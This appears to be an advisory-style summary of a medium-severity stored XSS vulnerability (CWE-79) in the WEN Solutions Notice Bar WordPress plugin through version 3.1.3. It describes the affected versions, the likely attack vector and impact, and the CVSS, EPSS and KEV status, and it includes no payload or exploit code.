Local administrators can create a notice bar entry containing malicious code that is then stored in the database and rendered in the site’s pages without input sanitization. When visitors load the affected site, the embedded script executes in their browsers. Based on the description, it is inferred that an attacker could steal authentication cookies, deface content or redirect users, but the CVE does not explicitly state these outcomes. The flaw is a classic stored XSS due to improper neutralization of input during web page generation, classified as CWE‑79.

The vulnerability is present in the WEN Solutions Notice Bar plugin for WordPress versions from the initial release up to and including 3.1.3. Any WordPress installation utilizing a version of the plugin within this range and allowing editors or administrators to input notice content is susceptible.

With a CVSS score of 6.5, the flaw falls into the medium severity range. The EPSS score of less than 1% indicates a very low current probability of exploitation, and the vulnerability is not listed in the CISA KEV catalog. Based on the description, the likely attack vector involves an authenticated administrator creating or editing a notice entry that contains malicious script; the stored payload is then delivered to all site visitors. This inference assumes that the notice content is displayed without sanitization. Since the script runs in the context of the site’s domain, any visitor to the page could be affected, potentially compromising session data or allowing content defacement.